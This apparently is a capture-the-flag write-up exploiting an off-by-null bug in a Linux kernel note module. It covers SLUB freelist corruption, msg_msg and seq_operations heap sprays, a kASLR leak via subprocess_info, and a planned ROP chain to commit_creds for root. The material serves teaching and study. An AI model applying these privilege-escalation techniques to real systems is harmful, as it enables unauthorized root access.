Looking at the decompiled module, we can see that we interact with it via ioctl, and that it allows 3 commands that basically do the following things:
Allocate exactly one chunk with a maximum size of 0x80
Delete the chunk if it's allocated
Edit the chunk if it's allocated
Read the data in the chunk
Off-by-null
If we look at the following line closely:
*(_BYTE *)(note + note_size) = 0;
We can see that it appends a null byte to the end of the data written to the chunk. The problem is that this code doesn't consider that the data may fill the chunk entirely. For example, if we have a 0x20-byte chunk and write 0x20 A's to it (or simply provide 0x20 as the size), the appended null byte becomes the 0x21st byte, overflowing into the first byte of the next chunk.
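The effect can be reproduced in plain userland C. This is only a sketch: `buggy_write` and `demo_off_by_null` are made-up names that mimic the module's write path, and the two chunks are simply two halves of one local buffer.

```c
#include <stdint.h>
#include <string.h>

#define CHUNK_SIZE 0x20

/* Mimics the module's write path: copy `size` bytes into the note, then
 * terminate it, without checking whether size == CHUNK_SIZE. */
static void buggy_write(uint8_t *note, const uint8_t *src, size_t size)
{
    memcpy(note, src, size);
    note[size] = 0; /* same as *(_BYTE *)(note + note_size) = 0 */
}

/* Returns the first byte of the neighbouring chunk after a full-size write. */
static uint8_t demo_off_by_null(void)
{
    uint8_t heap[2 * CHUNK_SIZE]; /* two adjacent 0x20-byte chunks */
    uint8_t payload[CHUNK_SIZE];

    memset(heap, 0xff, sizeof(heap)); /* neighbour starts out as 0xff bytes */
    memset(payload, 'A', sizeof(payload));

    buggy_write(heap, payload, CHUNK_SIZE);
    return heap[CHUNK_SIZE]; /* first byte of the second chunk */
}
```

After the call, the first byte of the second chunk is 0x00 even though we only ever wrote to the first one.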
SLUB is the default allocator used by the Linux kernel, and it works very differently from ptmalloc2 (the default glibc allocator). SLUB chunks don't need to carry their sizes, since chunks are allocated in separate regions according to their size. Those regions are called slabs, and each slab serves requests up to a given size (0x20, 0x40, 0x60, 0x80...).
Each slab has a freelist, which is a linked list of all the free chunks on that slab. Each node has an fd pointer that points to the next free chunk, in a similar way to how userland freelists work.
That being said, imagine we have a free chunk in the 0x80 slab at address 0xdead00, and that the next free chunk (pointed to by its fd pointer) is at 0xdead80.
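To see which slab a request ends up in, here is a small lookup sketch. The size list is an assumption: it matches the general-purpose kmalloc caches of a typical x86-64 build and may differ on other configurations. `kmalloc_cache_for` is a made-up helper name.

```c
#include <stddef.h>

/* General-purpose kmalloc cache sizes on a typical x86-64 build
 * (assumption: default configuration; other builds may differ). */
static const size_t kmalloc_sizes[] = {
    0x8, 0x10, 0x20, 0x40, 0x60, 0x80, 0xc0, 0x100,
    0x200, 0x400, 0x800, 0x1000, 0x2000,
};

/* Returns the chunk size of the smallest cache that fits `size`
 * (for size >= 1), or 0 if it is larger than the caches listed above. */
static size_t kmalloc_cache_for(size_t size)
{
    size_t n = sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]);

    for (size_t i = 0; i < n; i++)
        if (size <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    return 0;
}
```

For example, a 0x50-byte request lands in the 0x60 slab, while anything from 0x61 to 0x80 bytes lands in the 0x80 slab.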
As long as the fd pointer of the 0xdead00 chunk remains intact, the next allocation will be allocated at 0xdead00 and the one after that will be allocated at 0xdead80.
So let's say we used our off-by-null bug right now.
If we overwrite the LSB of the fd pointer of the 0xdead00 chunk with a null byte, 0xdead80 becomes 0xdead00, so the chunk now points to itself. This changes the allocation flow: the next allocation will land at 0xdead00, and the one after that will land at 0xdead00 again. This allows us to have two chunks overlapping each other at the exact same location in memory.
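The whole scenario can be simulated in userland. This is a toy model under a few assumptions: the fd pointer sits in the first 8 bytes of a free chunk, it is stored unobfuscated, and the machine is little-endian. The helper names (`sim_setup`, `sim_alloc`, `sim_off_by_null`) are made up for illustration.

```c
#include <stdint.h>
#include <string.h>

#define BASE  0xdeac80UL /* simulated address of the first chunk */
#define CHUNK 0x80UL

static uint8_t  mem[4 * CHUNK]; /* four adjacent 0x80 chunks */
static uint64_t freelist_head;  /* simulated address of the first free chunk */

/* Translate a simulated address into a pointer inside mem[]. */
static uint8_t *at(uint64_t addr) { return &mem[addr - BASE]; }

/* Pop the head of the freelist; the fd pointer is read from the first
 * 8 bytes of the chunk being handed out. */
static uint64_t sim_alloc(void)
{
    uint64_t chunk = freelist_head;

    memcpy(&freelist_head, at(chunk), sizeof(freelist_head));
    return chunk;
}

/* 0xdeac80 is our note (allocated); the freelist is
 * 0xdead00 -> 0xdead80 -> 0xdeae00. */
static void sim_setup(void)
{
    uint64_t fd;

    memset(mem, 0, sizeof(mem));
    fd = 0xdead80; memcpy(at(0xdead00), &fd, sizeof(fd));
    fd = 0xdeae00; memcpy(at(0xdead80), &fd, sizeof(fd));
    freelist_head = 0xdead00;
}

/* Off-by-null from the note at 0xdeac80: zero the byte right after it,
 * which is the least significant byte of the fd stored at 0xdead00. */
static void sim_off_by_null(void)
{
    *at(0xdeac80 + CHUNK) = 0;
}
```

Without the bug, two calls to `sim_alloc()` return 0xdead00 and then 0xdead80. After `sim_off_by_null()`, both calls return 0xdead00.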
Heap spray
/* msg_msg spray 0x80 slab */
open_msg();
msgbuf.mtype = 1;
memset(msgbuf.mtext, 'A', sizeof(msgbuf.mtext));
for (int i = 0; i < 0x21; i++) {
    /* 0x30 accounts for the msg_msg header */
    msgsnd(qid, &msgbuf, sizeof(msgbuf.mtext) - 0x30, 0);
}
So far we know that if our chunk sits right before a free chunk whose address has 0x00 as its LSB, we can make that free chunk reference itself, triggering the overlap. But how do we get our chunk there in the first place?
Heap spray is the answer.
If we keep spamming allocations in the same slab we want to corrupt, we push down the location where our own chunk will end up.
The module only allows us to allocate 1 chunk, so we will have to resort to other kernel objects that can be allocated from userland. For the 0x80 slab we can use the msg_msg object.
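As a rough, self-contained sketch of such a spray: every message is stored in the kernel as a 0x30-byte msg_msg header followed by the payload, so a 0x50-byte payload makes the whole object fit the 0x80 slab exactly. The names `spray_msg`, `msg_payload_size` and `spray_msg_msg` are made up for this example, and the private queue created with `msgget` stands in for whatever `open_msg()` does in the original exploit.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define MSG_MSG_HDR 0x30 /* sizeof(struct msg_msg) on x86-64 */
#define TARGET_SLAB 0x80

/* Payload length that makes header + payload land exactly in `slab`. */
static size_t msg_payload_size(size_t slab) { return slab - MSG_MSG_HDR; }

struct spray_msg {
    long mtype;
    char mtext[TARGET_SLAB - MSG_MSG_HDR];
};

/* Sends `count` messages to a fresh private queue. Returns the queue id,
 * or -1 on failure. The messages stay allocated in the kernel until they
 * are received or the queue is removed. */
static int spray_msg_msg(int count)
{
    struct spray_msg msg;
    int qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);

    if (qid < 0)
        return -1;

    msg.mtype = 1; /* mtype must be greater than 0 */
    memset(msg.mtext, 'A', sizeof(msg.mtext));
    for (int i = 0; i < count; i++)
        if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) < 0)
            return -1;
    return qid;
}
```

Calling `spray_msg_msg(0x21)` before allocating the note mirrors the loop used in this write-up.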
Abusing kernel structures
The vulnerable module only allows us to allocate one chunk, and this one chunk does not contain any important structures or pointers, making it a really bad victim candidate.
In userland each process has its own separate heap, but in kernelland there is only one heap, and every allocation from any module, syscall or other kernel activity goes to the same place. That means we can use some other kernel structure as the victim for the overlap. For example, if we trigger the allocation of a chunk that holds a kernel pointer, we can read it through our overlap and defeat kASLR, and if we overlap with a chunk that holds a function pointer that will be called, we can control RIP. Here are some awesome references on which kernel structures we can use to aid our exploitation:
Our overlap will be composed of two chunks, a controllable chunk which is the one allocated by the module to which we can read/write whatever we want, and a victim chunk, which contains important data that we want to mess with.
In order to leak the kernel base and defeat kASLR I decided to overlap with a subprocess_info object in the 0x80 slab. This can be done simply by calling:
socket(22, AF_INET, 0);
Which will trigger a subprocess_info object to be allocated in the heap.
If we check its definition, we can see that we can use the second qword to leak a heap pointer and the fourth qword to leak a kernel pointer, from which we can compute the kernel base.
The process to control RIP was very similar to what we just did, but instead of having subprocess_info as the victim we will target seq_operations, since it contains a function pointer that will be called when we call read(). This structure lives in the 0x20 slab, so I had to use a different spray. I ended up using seq_operations for both the spray and the overlap.
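A sketch of how the leaked bytes could be parsed once they are read back through the controllable chunk. The struct only mirrors the first four qwords as described above (the work_struct embedded at the start of subprocess_info). `LEAK_FUNC_OFFSET` is a placeholder, since the distance between the leaked function and the kernel base depends on the target build, and `parse_leak` is a made-up helper name.

```c
#include <stdint.h>
#include <string.h>

/* Placeholder (assumption): offset of the leaked function from the kernel
 * base. The real value has to be taken from the target kernel image. */
#define LEAK_FUNC_OFFSET 0x8c5c0UL

/* Only the first four qwords of subprocess_info. */
struct subprocess_info_head {
    uint64_t work_data;       /* qword 1 */
    uint64_t work_entry_next; /* qword 2: list pointer into the heap */
    uint64_t work_entry_prev; /* qword 3 */
    uint64_t work_func;       /* qword 4: pointer into kernel text */
};

struct leak {
    uint64_t heap_ptr;
    uint64_t kbase;
};

/* `dump` is the data read back from the overlapping chunk. */
static struct leak parse_leak(const uint8_t *dump)
{
    struct subprocess_info_head head;
    struct leak out;

    memcpy(&head, dump, sizeof(head));
    out.heap_ptr = head.work_entry_next;
    out.kbase    = head.work_func - LEAK_FUNC_OFFSET;
    return out;
}
```

The resulting `kbase` is what every gadget and function address gets rebased on later.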
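A minimal sketch of a seq_operations spray. It assumes the common trick of opening /proc/self/stat, which makes the kernel allocate one seq_operations per open. The write-up does not say which file was used, so treat the path as an assumption. The mirror struct and the helper names are made up for this example.

```c
#include <fcntl.h>
#include <unistd.h>

/* Userland mirror of the kernel's struct seq_operations: four function
 * pointers, which is 0x20 bytes on a 64-bit kernel. */
struct seq_operations_mirror {
    void *start;
    void *stop;
    void *next;
    void *show;
};

/* Opens /proc/self/stat `count` times and stores the descriptors in
 * `fds`. Returns how many opens succeeded. */
static int spray_seq_ops(int *fds, int count)
{
    int ok = 0;

    for (int i = 0; i < count; i++) {
        fds[i] = open("/proc/self/stat", O_RDONLY);
        if (fds[i] >= 0)
            ok++;
    }
    return ok;
}

/* read() on such a descriptor makes the kernel call the start pointer
 * of the matching seq_operations. */
static long trigger_start(int fd)
{
    char c;

    return (long)read(fd, &c, 1);
}
```

Once the overlap lets us overwrite `start` in the victim object, calling `trigger_start()` on each sprayed descriptor is what redirects execution.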
After having control of RIP, our best shot is to build a ROP chain. Notice that in kernel exploitation, if you already have a shell, it's completely useless to call something like system("/bin/sh"). Our real goal is to call commit_creds(prepare_kernel_cred(0)), swap the context back to userland with our original userland registers, and then pop a shell. I'm currently on the heap, not on the stack, so I can't put a ROP chain here, since execution won't return to the chain after the first gadget. One way to work around this issue is to use a gadget that moves rsp to a fixed address, then mmap a region containing that address, basically creating a fake stack where we can store our ROP chain.
Notice that we need our userland registers in order to swap the context back to userland, so we need to back them up first and then use them in our ROP chain.
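One possible way to back up those registers, as a sketch for x86-64 with GCC or Clang inline assembly. The variable names and `save_state` are illustrative, not taken from the original exploit. The `lea` instructions step over the red zone so that `pushfq` cannot clobber compiler data stored below rsp.

```c
#include <stdint.h>

static uint64_t user_cs, user_ss, user_rflags, user_sp;

/* Snapshot the registers that iretq will need to return to userland.
 * Must run in userland before the kernel bug is triggered. */
static void save_state(void)
{
#if defined(__x86_64__)
    __asm__ volatile(
        "mov %%cs, %0\n\t"
        "mov %%ss, %1\n\t"
        "mov %%rsp, %2\n\t"
        "lea -128(%%rsp), %%rsp\n\t" /* skip the red zone, flags untouched */
        "pushfq\n\t"
        "pop %3\n\t"
        "lea 128(%%rsp), %%rsp\n\t"  /* restore rsp */
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_sp), "=r"(user_rflags)
        :
        : "memory");
#endif
}
```

The saved values, together with the address of a userland function that spawns the shell, form the last five qwords of the ROP chain.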